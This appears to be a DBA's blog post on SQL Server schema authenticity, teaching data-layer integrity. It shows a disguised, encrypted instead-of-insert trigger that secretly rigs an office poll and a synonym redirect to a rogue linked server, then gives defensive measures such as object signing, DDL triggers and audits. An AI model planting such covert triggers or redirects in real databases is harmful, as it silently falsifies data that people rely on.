Digital Non-Repudiation is about distributed communication authenticity. Non-repudiation in the digital security context is a proactive design concept intended to simulate the authentication of a fully witnessed handwritten authorization. Evidence that this is a hard problem is found in the still widespread requirement for notarized handwritten signatures.
Non-repudiation as a data layer design element has been widely rejected as unnecessary and invalid because the database is treated as an implicitly trusted internal resource. Why would anyone want to verify their own signature, and what real use could it serve? Most argue that protecting the endpoint is protecting the data layer. While there is some short-term profitability in that position, the breakdown of data layer authenticity is rife with nightmare stories. It is silly to ignore these well-established risks just because non-repudiation alone does not solve the whole problem, yet that seems to be the status quo.
Elevation-of-authority and man-in-the-middle attacks are widespread, most often with absolutely no detection or prevention measures in place. Furthermore, both the sophistication of attackers and the number of known exploitable attack vectors are increasing, due mostly to neglect.
One major authenticity risk area is forgery or fakery of referenced objects at the data layer. Even in a change-controlled SQL Server database, objects and configuration can be modified in ways that are not reflected in the current version in the source control system. It is common for shops that develop T-SQL to rely upon periodic forced re-synchronization between the “current” source control “version” and the actual objects on a SQL Server nominally at that version. It is essential to eliminate this drift. No matter how astute the data access monitoring (DAM) tools are, if you do not have the T-SQL source truly under control you don’t have much in the way of authenticity.
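The drift described above can be detected mechanically. Here is a minimal sketch that assumes a baseline table, `dbo.module_baseline` (a hypothetical name), repopulated at every sanctioned deployment with a hash of each module's definition as checked into source control:

```sql
-- Compare a hash of each live module definition against the deployment
-- baseline. Any mismatch or missing baseline row is drift to investigate.
-- (dbo.module_baseline is an assumed table: object_name, definition_hash)
SELECT o.name
     , CASE WHEN b.definition_hash IS NULL
                 THEN 'not in baseline'
            WHEN b.definition_hash <> HASHBYTES('SHA2_256', m.definition)
                 THEN 'drifted from baseline'
            ELSE 'matches baseline'
       END AS drift_status
FROM sys.sql_modules m
JOIN sys.objects o
  ON o.object_id = m.object_id
LEFT JOIN dbo.module_baseline b
  ON b.object_name = o.name
WHERE o.is_ms_shipped = 0;
```

Note that HASHBYTES input was limited to 8000 bytes before SQL Server 2016, so very large modules may need to be hashed in segments on older versions.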
Modes of Authenticity
To combat forgery and fakery, a method to determine the authenticity of the other ‘players’ in a given communication is required. Players in a database communication could include client applications, users, server instances, databases, tables, stored procedures, functions, triggers, queues, ACLs, network switchgear, etc. Unless your DAM tools can fully verify object authenticity, you are not doing enough. Consider this table, which lists several ways to communicate along with some authenticity qualities of each communication method:
| communication method | authenticator | weakness | strength |
|---|---|---|---|
| signed in triplicate | signed copy | deniable signature | durable |
| signed and notarized | Public Notary | inconvenient | + trusted authenticator |
| signed network communication | trust broker | posers & rogues | external authenticity |
| data access | SQL principal hierarchy | posers & rogues | authorization |
| DML objects | SQL catalog | posers & rogues | principle of least privilege |
| signed DML objects | SQL encryption hierarchy | rogues | schema object authenticity |
Whether schema authenticity at the data layer strictly qualifies as non-repudiation in the network-layer sense is unimportant, provided there is some willingness to use the strengths, and shore up the weaknesses, of authenticity across the various architectural styles of communication and at all of the various structural layers. It is only by examining the conceptual premises of non-repudiation that the concept can help provide strong authenticity at the data layer.
- A T-SQL attacker who obtains the ability to connect with elevated sysadmin or dbo SQL Server credentials cannot be stopped from carrying out their will in the database.
- Users with dbo database credentials – including sysadmin server role members, who are automatically mapped to dbo when they enter any database – have implicit permission to change all database configuration and object definitions in ways that will alter results returned to the application yet go undetected by the application or by internal database signature validation of the objects directly involved in legitimate database operations.
- There is always a plausible scenario where a currently trusted credential with elevated authority unexpectedly becomes an attacker armed with sysadmin or dbo authority.
- Any credential with administrative access within the operating system or network cannot be prevented from gaining sysadmin and/or dbo access to the database.
- Login-access-based non-repudiation protocols cannot assure the authenticity of any database operation or activity.
In non-repudiation, about all that is required is common access by the two parties to a public/private key pair (CREATE CERTIFICATE) to certify the communication. The objective of non-repudiation is mostly to assure, at a pragmatic level, that everyone gets the message. Non-repudiation doesn’t care what the two parties do to obtain their credentials, what happens after the communication, or even whether the information exchange was useful and necessary – only that both credentials are able to participate and, usually, to impose an altered state during the communication.
“Non-repudiation protocols are designed for verifying that, when two parties exchange information over a network, neither one nor the other can deny having participated to this communication.” (Klay & Vigneron)
Obviously, the ‘parties’ in a database operation that runs completely within the SQL Server’s memory space do not normally exchange information over a network. But they certainly can if someone wants that functionality – or injects that functionality. Likewise, there should be no argument that the ‘two parties’ in a database operation are really two software components of a common host most of the time, and in fact are more likely to be three or more components than the always dyadic constraint of communication between so-called network endpoints. The party can grow quite large when you start looking at all the database objects that get involved – and thus can be manipulated maliciously – in a database operation. Limiting the communication at the database to two external parties is beyond unrealistic. This goes to a very important point I wish to establish above all else in this post: a malicious user can easily obtain credentials holding elevated authority in the database and so can easily modify the database in ways that significantly alter the database and/or the data returned.
At the sports book where I did a little DBA work, one clever syndicate (an organized group of thieves and crooks) figured out how to flip their bets to the winner on the over/under in just the instant between the end of a game or contest somewhere in the world and the moment the internal business layer automation could settle the wagers for the event. As far as I know it was never possible to say they were actually caught, either… It is nothing short of astonishing that this could have been done without insider assistance; if you saw the complexity of what they had done to manipulate wagers and the thoroughness used to cover their tracks, you would surely agree. Yet “it was outsiders” seems to be the conclusion reached in the investigation (by the management team mostly, but Interpol and even Scotland Yard were involved somehow – so I was told anyway). This was all even before the crooks began to get an idea anyone was on to them, but nabbing international attackers is not such an easy thing to do – to some (large?) extent due to corruption, I’m betting. Another part of this particular scam involved playing poker with the dishonest winnings against another syndicate member and losing intentionally, to launder the ill-gotten winnings from the tainted account where the bet had been flipped into an account not directly tied to the hack prior to cashing in. (Probably a good table to be sitting at for the honest gambler too!) I was never really in on the skinny but did hear a few of the details: investigators somehow decided that there was no insider involved. I was even once shown a driver’s license photo of the supposed top guy in the syndicate from the other side of the world. I also finally got the tepid OK I had been so far hopelessly seeking to reduce the permissions used by legacy application-level SQL Logins.
Still, I could not get them to budge on using Windows Authentication, because they could not get their act together to move away from the one ginormous data set connected directly to scads of web servers in a so-called DMZ architecture. I have no idea how it ended with the attackers; I had no choice but to move on to hotter fires. This was simply the sort of thing that went on continuously in that industry, although these guys were a little more insidious – and a little more successful – than most crooks. I continue to see that the state of siege the on-line sports book has been under for the last 10 years grows ever more pervasive all across the Internet.
It is the rare application that is able to detect, let alone respond to, the morphing or injection of data and database objects or the resulting illicit run-time activity that follows. I am pretty sure that statement applies to all flavors of database. For T-SQL application layers to be aware of the integrity of the data at that layer is, I know, both quite possible and almost never done. In an extension of older sloppy developer foibles (e.g., it compiles so it works; I got one right answer so it is correct), the accepted practice instead is an existential presumption of the authenticity of referenced database objects (e.g., tables, stored procedures, functions, triggers, views, permissions, users, roles, certificates, etc.). For the most part, this presumption relies upon the intrinsic hierarchical role-based security model and blind confidence in the integrity of the system(s). This is slightly more realistic when only a trusted few are able to access the database from a role at the top of the hierarchy and most staff have highly restricted or revoked access.
True mitigation demands far more than is now done. I must reiterate that greed – profiting by doing as little as you can get away with – is the primary driver of today’s lack of security. To wit, it is obviously necessary to vigilantly assure that no relevant schema object or configuration setting has changed, especially in a way that alters the results of database operations. Only when there is certainty about the integrity of all relevant schema objects is it possible to certify the authenticity of any database operation. I need an example to even feel like I am explaining my premise adequately.
A Facetious, Fictitious, Farcical Far Too Likely to be True Example
Consider this schema, which inserts a Boolean value using a stored procedure. There is no other functionality. Period.
create table dbo.tally
( id int identity(1,1) PRIMARY KEY
, user_choice BIT );
go
create proc dbo.submit_choice ( @choice BIT )
as
insert dbo.tally (user_choice) values (@choice);
go
Let’s say this is a temporary polling station set up in an office kitchen – restricted to employees, and anyone else who can gain access to the offices – and freely accessible to all employees of the business. The poll promises an anonymous result, with a stated request (a rule of trust) that only employees vote and that everyone vote only once: there is no way to tell who placed any vote. The kitchen users are asked whether they would like to discontinue catered snacks and lunches in the kitchen, in response to a widespread outcry after a recent outbreak of food-borne illness among workers when the potato salad was left out over the weekend. The polling station is a re-purposed laptop placed on the end of the kitchen counter, next to the toaster, with text instructions for the one-question survey loaded into Notepad on the desktop telling kitchen users how to open the SSMS query tool, the single user name and password needed to connect to the database, and examples of using a stored procedure from an SSMS query connection to place a vote. The exact syntax for yes and no can be copied from Notepad and pasted into the SSMS query tool, as can a reminder for “each user to PLEASE! vote only once”. There is also the query that will be used to determine the result, so anyone can see the current tally. Not a second thought is given to security or user interface, due to the high confidence that only authentic and authorized employees will vote.
-- YES - paste this to query window and execute to vote yes
exec dbo.submit_choice 1;
-- NO - paste this to query window and execute to vote no
exec dbo.submit_choice 0;
-- this query will determine the winner
select TOP(1) user_choice as [winner]
     , count(*) AS votes
from dbo.tally
group by user_choice
order by votes desc;
OK, so people drop in a few votes and someone queries to see how things look:
exec dbo.submit_choice 0; -- no
exec dbo.submit_choice 0; -- no
exec dbo.submit_choice 1; -- yes
exec dbo.submit_choice 0; -- no
select TOP(1) user_choice as [winner]
     , count(*) AS votes
from dbo.tally
group by user_choice
order by votes desc;
The result, of course, is
winner votes
------ -----------
no     3
That looks right to me.
What no one could have known is that a militant raw-vegan PETA loony colleague – a web developer with adequate SQL skills and an exceptional attitude who actually did not use the kitchen much because of her now four-year-running raw vegan ‘fad’ diet – would be one of the first to enter the kitchen after the voting begins. This person’s naked agenda is the abolition of meat and meat by-products from the human diet by all non-violent means possible. She pops open the connection to the database as described in the note and needs only a few seconds to understand the schema and the stored procedure, a moment to think, and a few keystrokes to add a trigger that would assure the outcome yet risk minimal additional scrutiny of the kind a completely outlandish result might invite.
create trigger dbo.MSIndexMaintenance on dbo.tally
with encryption
instead of insert
as
set nocount on;
insert dbo.tally (user_choice)
select case when ( t.now < .55 ) then 1 else i.user_choice end
from inserted as i
cross join ( select sum(cast(user_choice as float))/count(*) as now
             from dbo.tally ) as t;
After running the exact same set of inserts again (remember, the other four votes are already there):
exec dbo.submit_choice 0; -- no
exec dbo.submit_choice 0; -- no
exec dbo.submit_choice 1; -- yes
exec dbo.submit_choice 0; -- no
select TOP(1) user_choice as [winner]
     , count(*) AS votes
from dbo.tally
group by user_choice
order by votes desc;
There are now 8 rows in the table. Six should hold the value 0 (no) and the other two should be 1 (yes). Right? Instead, the result from the summary query is now:
winner votes
------ -----------
yes    4
This may explain why so many corporate kitchens have gone vegan! What’s worse (better?), signature checking of the compiled objects to establish a non-repudiated communication would not have helped the bottom line of a single feedlot or hot dog factory. The signature of a SQL Server table is unaffected by the addition, modification or removal of a trigger or a permission placed on that table.
Adding a trigger is not the only hijinks possible. A synonym pointing to a linked server location that replaces the table is another possibility for ‘stealing’ the vote. Or how about simply adding the trigger logic to the stored procedure? Other possibilities may occur to the reader. Many exist.
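The synonym swap mentioned above deserves a sketch, because it is so cheap to pull off. The linked server and remote database names here are entirely made up:

```sql
-- Rename the real table out of the way, then plant a synonym with the
-- original name that resolves to a table the attacker controls elsewhere.
EXEC sp_rename 'dbo.tally', 'tally_retired';

CREATE SYNONYM dbo.tally
    FOR [RogueLinkedServer].[shadow_db].[dbo].[tally];

-- dbo.submit_choice still "works": the votes simply land in the
-- attacker's remote table, and the procedure's own signature, if any,
-- is untouched because the procedure text never changed.
```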
The example shows the ease and stealth with which a T-SQL outcome can be manipulated. If steps are not taken to assure schema authenticity at all times, the result is rendered invalid and any claim of authenticity is left looking foolish by the facts after a hack. This hole in the signature is comparable to the utility company allowing you one electrical outlet that does not go through the meter (guess where I plug everything in).
One thing is for sure: the hackers will continue to bang away at Microsoft implementations in search of vulnerabilities as long as Windows is a leader in the server space. And if there is a problem it will continue to become known before too many people get stomped on. However, some will always feel the boot. I can only hope it does not become known via my data… Notice I mention only Windows and not SQL Server. That is because an elevation-of-authority attack will most likely occur before the stolen, highly privileged user credentials are used to gain database access. The only other real possibilities are an insider attack or SQL injection combined with patience and plenty of today’s poor development practices.
Of course the base farcical ‘mistake’ in the example application is reliance upon the honesty of people. That is not a problem limited to technology. Almost every activity of modern life makes this mistake of foolish trust to one degree or another. It is admittedly presented as a self-portrait in caricature in the example.
In computer applications trust is used as an acceptable calculated risk in the interest of making a fast buck. On the Internet, even that friend, loved one, colleague or boss can be convincingly spoofed. The only rule you need to stay digitally safe, especially when the Internet is in the picture, is “trust no-one”. Most of us step over that boundary every time we move and seldom if ever realize it. We forget that computers are not people any more than corporations are people or politicians are honest.
To be sure, there are many other design errors in the made-up example, some even intentional. For example, the presumption that the data is safe because it is in a secure physical location is not only fallacious but obviously proved to be an invalid assumption based solely on hope. Neither blind faith nor speculative design principles will produce authentic results.
So, the status quo is that database operations need not meet the test of non-repudiation. OK, fine. Wrong, but nothing I can do anything about as a DBA. What I cannot and will not accept is the unspoken consequent decision to simply not worry about authenticity at the data layer. It makes my head spin to think too long about all the ways the integrity of a database operation can be maliciously corrupted or compromised. Non-repudiation, for its part, sets a pretty low bar for authenticity, because it presumes that communication is dyadic and because it has no interest in the process, only in the credentials presented by the participants.
Simplistic shared-secret verification à la non-repudiation is inadequate to assure communication authenticity in SQL Server. Many changes to an object’s component attributes (i.e., indexes, triggers, permissions, etc.) and dependencies (i.e., called objects and referenced tables) are not encapsulated by an object’s signature when signed using T-SQL’s ADD SIGNATURE statement. For example, object signing alone on a table does not see any CREATE/ALTER/DROP of triggers or indexes on the table, or any GRANT/DENY/REVOKE of permissions applied to that table. Likewise, changing the table in a way that does invalidate its signature would do nothing to the T-SQL signature of a stored procedure that references the table or of a trigger attached to the table.
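That blind spot is easy to demonstrate against the polling schema. In this sketch the certificate name, password and trigger are all illustrative; the point is only that the procedure's signature survives a new trigger on the table it references:

```sql
-- A certificate whose private key is protected by a password
CREATE CERTIFICATE DemoCert
    ENCRYPTION BY PASSWORD = 'Str0ng!Pa$$phrase'
    WITH SUBJECT = 'signature blind spot demo';
GO
ADD SIGNATURE TO dbo.submit_choice
    BY CERTIFICATE DemoCert WITH PASSWORD = 'Str0ng!Pa$$phrase';
GO
-- A hostile trigger appears on the referenced table...
CREATE TRIGGER dbo.trg_sneaky ON dbo.tally INSTEAD OF INSERT
AS INSERT dbo.tally (user_choice) SELECT 1 FROM inserted;
GO
-- ...yet the procedure's signature is still reported as valid
SELECT IS_OBJECTSIGNED( 'OBJECT'
                      , OBJECT_ID('dbo.submit_choice')
                      , 'CERTIFICATE'
                      , thumbprint ) AS still_signed
FROM sys.certificates
WHERE name = 'DemoCert';
```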
Toward Authenticity at the Data Layer
Actions to gain some confidence in the authenticity of database operations include:
- Control change. Allow only scheduled, reviewed and well tested changes. Be unequivocal about this. Don’t merely aim for mostly planned change while always holding the door open for the occasional one-off, even one that passes the established sniff test, reviews and standards. Be willing to adjust the standard to improve results.
- Limit change. Limit the number of individuals who can apply changes to the environment, and limit the number of changes any individual can make to only and exactly those needed to do what they do. Always precisely align the permissions of a database user with the access that user requires (principle of least privilege).
- Digitally sign all objects in the schema at creation. Use a fully secured private key infrastructure and then ‘continuously’ verify that the signatures of self and of all legitimately referenced objects are intact at every instant during run time. The private key of a certificate can be removed from the SQL Server when not needed, to help protect the private key. (Object signatures can be verified using T-SQL’s IS_OBJECTSIGNED() function without the private key, yet a signature cannot be reapplied until the private key is restored.) Consider a password-protected certificate with a very strong password when the security granularity required for the key is not aligned with the role/principal hierarchy.
- Silently monitor for changes. An asynchronous process that captures all change is essential for monitoring and forensics. One method is to use EVENT NOTIFICATIONs that include all DDL_DATABASE_LEVEL_EVENTS. Log, and protect the log from unauthorized access. Maintain high confidence that not only the message but also the message delivery system is not compromised. Any process able to leverage dbo or sysadmin authority can compromise any SQL Server change control system, including event notifications.
- Proactively prevent unauthorized change. The intersections of authority between a role-based provisioning model and a permissions-based access model can create threat holes: some users end up with more access than they need. The most likely suspect is a group from the domain, tree or ACL plopped into a role in SQL Server; most never know what they can do. The easiest way to become convinced is to try to plug a hole and then listen to ’em complain. A DDL trigger can roll back all DDL_DATABASE_LEVEL_EVENTS to stop change by all users – and it does, except for changes to the DDL trigger itself by users that have ALTER ANY DATABASE DDL TRIGGER or DROP TRIGGER permissions. One hardening step is to add a second, identical trigger, making it impossible to drop either trigger unless the user first disables one and then drops the other. SQL Trace, too, can see DISABLE TRIGGER events. An alert from a custom trace event watching for the text “DISABLE TRIGGER” could be configured to protect against exactly that. This could actually be effective in restricting a dbo-authorized attacker in some scenarios but would be just another trivial obstacle for a sysadmin-authorized attacker. Without exhaustive regression testing and extensive redundancy there can be no confidence of protection.
- Encrypt sensitive data. Use encryption hierarchy(ies) that require strong password(s), or encryption based on keys not available to [other] database users. Maintain secure on-site and off-site backups of all keys, fully secured at all times. Restrict key management to a very small group of well trained and absolutely trusted users. Furthermore, always require cooperative-change rules of trust within the key management infrastructure (separation of responsibility).
- Verify schema integrity with each execution at run time. The most straightforward verification might be to compare the object tree in the schema to a hard-coded static list encapsulated in an encrypted and signed object. The object holding the static list cannot be changed – by any user – without the loss of the signature as the object is changed. Unattended users must not be able to reapply the well protected signature, reducing the check for change to an inexpensive IF EXISTS that verifies the signature via the catalog view of encrypted objects filtered by the key/cert of your signature. In other – even more secure? – scenarios it may provide more confidence to include signed data value validation between executable database objects à la non-repudiation. Complementary to object signing, there should be some assurance that the object signature or key used is not compromised. The verification must also include all referenced objects – expected or unexpected. Consider signing a parameter, or introducing signatures between called database objects based on a different well protected key than the one used to sign the objects, to build greater confidence in the objects’ authenticity. The key of the data signature gives you an additional common shared local resource – one that should be difficult to compromise – for cross-validation of the objects’ authenticity.
- Use system encryption for all objects (WITH ENCRYPTION). This helps prevent the uninvited from following along and provides the added benefit of protecting strong and long secrets that can be compiled into encrypted objects without risk of exposure as clear text. Even the combination of DML object encryption and SQL Trace’s built-in encrypted-statement obfuscation masks is hardly an effective run-time secret protection at this time. (Windows debugger attackers may still be able to steal secrets from buffers as clear text. It is possible to make sure live systems do not have the necessary debugger symbols.) As a DBA there is nothing more frustrating than trying to support a 3rd-party database with encrypted objects. I will do what I can to avoid that thankless task, but that doesn’t make me right on the matter. Encrypting your own objects is not so painful because you can decrypt when you want.
- Disable the cross-database ownership chaining (DB_CHAINING) and TRUSTWORTHY database options. This will reduce the exposure to cross-database elevation-of-authority attacks.
- Don’t help hackers with error details. Always use TRY-CATCH error handling and watch the @@NESTLEVEL value in the CATCH block. When @@NESTLEVEL = 0 the error occurred at the command line and should not be displayed. When @@NESTLEVEL = 1 the caller is a command line and error information should not be returned to that calling session. When @@NESTLEVEL > 1, return just enough information for the caller to locate the logged error.
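The last item above might be sketched as a CATCH block that logs everything but leaks almost nothing. The logging table `dbo.error_log` is an assumed name, and the exact nest-level policy should follow whatever rule your shop settles on:

```sql
BEGIN TRY
    EXEC dbo.submit_choice 1;   -- any guarded operation
END TRY
BEGIN CATCH
    -- Log full detail privately (dbo.error_log is a hypothetical table)
    DECLARE @log_id INT;
    INSERT dbo.error_log (error_number, error_message, logged_at)
    VALUES (ERROR_NUMBER(), ERROR_MESSAGE(), SYSDATETIME());
    SET @log_id = SCOPE_IDENTITY();

    -- Deeply nested callers get only a pointer to the logged error;
    -- an ad hoc command-line session gets nothing at all.
    IF @@NESTLEVEL > 1
        RAISERROR('operation failed; see error log id %d', 11, 1, @log_id);
END CATCH
```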
This is merely a listing of some practices necessary for confidence in authenticity at the data layer. Fleshing out the requirements is, for now, a never-ending thought problem for all. Without meeting all measures in combination, database data is not safe from posers (including elevation-of-authority attackers, brute force password attackers, SQL injection attackers, etc.) – or from rogue insiders. There is always more that can and should be done. For example, in highly secured settings it may be worthwhile to sign object interactions using a technique that looks a lot like non-repudiation. Eventually security always succumbs to the greed mantra (aka the law of diminishing returns) and the level of perceived risk (aka hope). I think it moves us ahead to acknowledge that perfect security is not attainable but must always and forever remain the objective.
A revised application with much higher assurance of object authenticity for that insert into a bit column would look a bit different. The example revision explodes the original application’s 10-line object creation script to over 200 lines of T-SQL.
:SETVAR SIGNATURE_PASSWORD "a_$1LLY-n-str0nG_fraze"
CREATE DATABASE test;
ALTER DATABASE test SET TRUSTWORTHY OFF;
ALTER DATABASE test SET DB_CHAINING OFF;
GO
USE test;
-- silent monitor
CREATE QUEUE DDLChangesQueue WITH RETENTION = ON;
CREATE SERVICE DDLChangesService
ON QUEUE DDLChangesQueue
( [http://schemas.microsoft.com/SQL/Notifications/PostEventNotification] );
CREATE EVENT NOTIFICATION DDLChanges
ON DATABASE
FOR DDL_DATABASE_LEVEL_EVENTS
TO SERVICE 'DDLChangesService', 'current database';
GO
ALTER AUTHORIZATION ON DATABASE::test TO sa;
GO
CREATE ROLE testAdministrator;
-- add current user to role
DECLARE @CreateUserDDL NVARCHAR(512);
SET @CreateUserDDL = N'CREATE USER [' + ORIGINAL_LOGIN() + N'];'
                   + N' EXEC sp_addrolemember ''testAdministrator'', '''
                   + ORIGINAL_LOGIN() + N'''';
EXEC sp_executesql @CreateUserDDL;
GO
-- cert private key protected by password
CREATE CERTIFICATE SigCert
    ENCRYPTION BY PASSWORD = '$(SIGNATURE_PASSWORD)'
    WITH SUBJECT = 'object signatures';
GO
CREATE TABLE dbo.tally
    ( Id UNIQUEIDENTIFIER NOT NULL -- int identity(1,1)
    , User_choice BIT );
GO
ADD SIGNATURE TO dbo.tally
    BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)';
GO
-- does not affect signature of table
CREATE CLUSTERED INDEX ixc_tally ON dbo.tally(user_choice);
GO
CREATE PROC dbo.submit_choice ( @choice BIT )
AS
BEGIN
BEGIN TRY
    IF ( SELECT IS_OBJECTSIGNED( 'OBJECT', @@PROCID
                               , 'CERTIFICATE', thumbprint )
              + IS_OBJECTSIGNED( 'OBJECT', OBJECT_ID('dbo.tally','U')
                               , 'CERTIFICATE', thumbprint )
              + IS_OBJECTSIGNED( 'OBJECT', OBJECT_ID('dbo.trg_tally','TR')
                               , 'CERTIFICATE', thumbprint )
              + ( SELECT COUNT(*) AS [NbrTriggers]
                  FROM sys.triggers
                  WHERE parent_id = OBJECT_ID('dbo.tally','U')
                    AND object_id <> OBJECT_ID('dbo.trg_tally','TR') )
         FROM sys.certificates
         WHERE name = 'SigCert'
           AND OBJECT_NAME(@@PROCID) = 'submit_choice' ) <> 3
        RAISERROR('unable to verify object signatures',16,1);
    INSERT dbo.tally (user_choice) VALUES (@choice);
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS ErrorNumber
         , ERROR_SEVERITY() AS ErrorSeverity
         , ERROR_STATE() AS ErrorState
         , ERROR_PROCEDURE() AS ErrorProcedure
         , ERROR_LINE() AS ErrorLine
         , ERROR_MESSAGE() AS ErrorMessage;
END CATCH
END
GO
ADD SIGNATURE TO dbo.submit_choice
    BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)';
GO
CREATE PROC dbo.get_results
AS
SELECT user_choice AS choice
     , RANK() OVER (ORDER BY COUNT(*) DESC) AS rank
     , COUNT(*) AS votes
FROM dbo.tally
GROUP BY user_choice
ORDER BY rank DESC;
GO
ADD SIGNATURE TO dbo.get_results
    BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)';
GO
-- instead of trigger fires BEFORE constraints
-- constraints are applied before after triggers
CREATE TRIGGER dbo.trg_tally ON dbo.tally
INSTEAD OF INSERT, UPDATE, DELETE
AS
BEGIN
BEGIN TRY
    -- only inserts, only 1 row at a time
    IF (SELECT COUNT(*) FROM inserted) > 1
        RAISERROR('no multi-row', 16, 1);
    IF (SELECT COUNT(*) FROM deleted) > 0
        IF (SELECT COUNT(*) FROM inserted) = 1
            RAISERROR('no update', 16, 1);
        ELSE
            RAISERROR('no delete', 16, 1);
    INSERT dbo.tally (id, user_choice)
    SELECT NEWID(), user_choice FROM inserted;
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS ErrorNumber
         , ERROR_SEVERITY() AS ErrorSeverity
         , ERROR_STATE() AS ErrorState
         , ERROR_PROCEDURE() AS ErrorProcedure
         , ERROR_LINE() AS ErrorLine
         , ERROR_MESSAGE() AS ErrorMessage;
END CATCH
END
GO
ADD SIGNATURE TO dbo.trg_tally
    BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)';
GO
CREATE TRIGGER trg_ddlChanges1 ON DATABASE
WITH ENCRYPTION
FOR DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
    DECLARE @User NVARCHAR(128);
BEGIN TRY
    SET @User = USER_NAME();
    -- error if the user making the change is not in testAdministrator
    -- even though IS_MEMBER('testAdministrator') would be false here
    IF NOT EXISTS ( SELECT *
                    FROM ( SELECT ddl.event.value('LoginName'
                                                 , 'NVARCHAR(128)') AS LoginName
                           FROM (SELECT EVENTDATA() AS change) this
                           CROSS APPLY change.nodes('/EVENT_INSTANCE') AS ddl(event)
                         ) q
                    JOIN sys.database_role_members r
                      ON q.LoginName = USER_NAME(r.member_principal_id)
                    WHERE r.role_principal_id = USER_ID('testAdministrator') )
       AND @User <> 'cdc'
        RAISERROR('Invalid User %s',16,1,@User) WITH LOG;
END TRY
BEGIN CATCH
    ROLLBACK;
    RAISERROR('fatal error',20,1,@User) WITH LOG;
END CATCH
END
GO
DISABLE TRIGGER ALL ON DATABASE
GO
CREATE TRIGGER trg_ddlChanges2 ON DATABASE
WITH ENCRYPTION
FOR DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
    DECLARE @User NVARCHAR(128);
BEGIN TRY
    SET @User = USER_NAME();
    -- error if the user making the change is not in testAdministrator
    -- even though IS_MEMBER('testAdministrator') would be false here
    IF NOT EXISTS ( SELECT *
                    FROM ( SELECT ddl.event.value('LoginName'
                                                 , 'NVARCHAR(128)') AS LoginName
                           FROM (SELECT EVENTDATA() AS change) this
                           CROSS APPLY change.nodes('/EVENT_INSTANCE') AS ddl(event)
                         ) q
                    JOIN sys.database_role_members r
                      ON q.LoginName = USER_NAME(r.member_principal_id)
                    WHERE r.role_principal_id = USER_ID('testAdministrator') )
       AND @User <> 'cdc'
        RAISERROR('Invalid User %s',16,1,@User) WITH LOG;
END TRY
BEGIN CATCH
    ROLLBACK;
    RAISERROR('fatal error',20,1,@User) WITH LOG;
END CATCH
END
GO
ENABLE TRIGGER ALL ON DATABASE
GO
SELECT o.name
     , ISNULL(IS_OBJECTSIGNED( 'OBJECT'
                             , o.object_id
                             , 'CERTIFICATE'
                             , c.thumbprint ), 0) AS [IsSigned]
     , c.name
FROM sys.objects o
LEFT JOIN sys.crypt_properties cp ON o.object_id = cp.major_id
LEFT JOIN sys.triggers t ON o.object_id = t.object_id
LEFT JOIN sys.certificates c ON c.thumbprint = cp.thumbprint
WHERE o.is_ms_shipped = 0;
GO
The best prevention for unauthorized sysadmin-level access to the database is to keep anyone and anything that should not be doing admin-level work from connecting with admin-level credentials. Limiting the number of sysadmins also helps, but the reality is that pretty much anyone who can set another user's password, or who can access the system running SQL Server as a local Windows Administrator, can find a way to connect to a SQL Server with sysadmin access. Once a connection to a SQL Server is established using valid credentials, there are no permissions, privileges, rights or roles that cannot be overridden by that sysadmin-empowered connection. At this time only protection from compromise of sensitive data by unauthorized sysadmin members looks possible. No matter what is done to prevent data compromise, any sysadmin can delete complete data rows, drop tables, even drop databases, or corrupt the data. It is only possible to prevent the sysadmin from knowing the meaning of encrypted data. A mildly determined malicious user with sysadmin authority and the intent to destroy data cannot be stopped from that goal. They can be delayed and, in most cases, identified after the fact. Delaying features are also useful to help show intent during forensic analysis. The best protections against the malicious insider are to hire trustworthy employees and to collect adequate forensic data into protected containers. Ideally, an audit trail that cannot be modified by a sysadmin-privileged user is needed.
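As a sketch of that last idea, a SQL Server audit can write schema and security changes to a file location that the service account can append to but not rewrite. The audit, specification, and path names below are illustrative, not from the original; the append-only ACL must be enforced at the OS or file-share level, since T-SQL alone cannot guarantee it:

```sql
-- Sketch only: object names and the UNC path are hypothetical.
CREATE SERVER AUDIT ForensicAudit
TO FILE ( FILEPATH = N'\\auditserver\append-only-share\' );
GO
CREATE SERVER AUDIT SPECIFICATION ForensicAuditSpec
FOR SERVER AUDIT ForensicAudit
    ADD (SCHEMA_OBJECT_CHANGE_GROUP),       -- DDL against user objects
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),  -- who joins/leaves sysadmin
    ADD (AUDIT_CHANGE_GROUP)                -- tampering with the audit itself
WITH (STATE = ON);
GO
ALTER SERVER AUDIT ForensicAudit WITH (STATE = ON);
GO
```

Note that AUDIT_CHANGE_GROUP records attempts to alter or stop the audit, so even a sysadmin who disables it leaves a trace in the rows already written.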
The information protection of encryption and signing is durable provided the private key is safe. Encryption scrambles data with a public key so that it can later be unscrambled only with the matching private key. Signing inverts this: data is scrambled with the private key of a key pair, and the signature is later unscrambled with the public key to verify the data. In either case the encryption keys, especially the private key, must be safeguarded.
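To make the sign/verify direction concrete, here is a minimal T-SQL sketch using an asymmetric key; the key name and password placeholder are illustrative, not from the original script:

```sql
-- Sketch only: key name and password are hypothetical.
CREATE ASYMMETRIC KEY DemoSigKey
    WITH ALGORITHM = RSA_2048
    ENCRYPTION BY PASSWORD = N'$(KEY_PASSWORD)';
GO
DECLARE @data NVARCHAR(100) = N'the message to protect';
DECLARE @sig VARBINARY(8000);

-- sign with the private key...
SET @sig = SIGNBYASYMKEY(ASYMKEY_ID(N'DemoSigKey'), @data, N'$(KEY_PASSWORD)');

-- ...verify with the public key: returns 1 only if the data is unchanged
SELECT VERIFYSIGNEDBYASYMKEY(ASYMKEY_ID(N'DemoSigKey'), @data, @sig) AS IsAuthentic;
```

If even one character of @data is altered after signing, the verify call returns 0, which is exactly the tamper-evidence non-repudiation relies on.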
The simple act of successfully sharing a well-protected key to sign and verify a signature is often considered adequate to establish non-repudiation. A weakness in this approach is the ease with which T-SQL can be manipulated without violating the signature. It is also necessary to verify that all other relevant schema elements continue to sport their signatures, that unsigned objects have not been introduced, and that none of the expected signed objects are missing.
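One way to cover those last two checks is a sweep over the catalog views that flags any user module not signed by the expected certificate. This sketch reuses the SigCert certificate name from the earlier script; an empty result set is the desired outcome:

```sql
-- List every user proc, function, or trigger NOT signed by SigCert.
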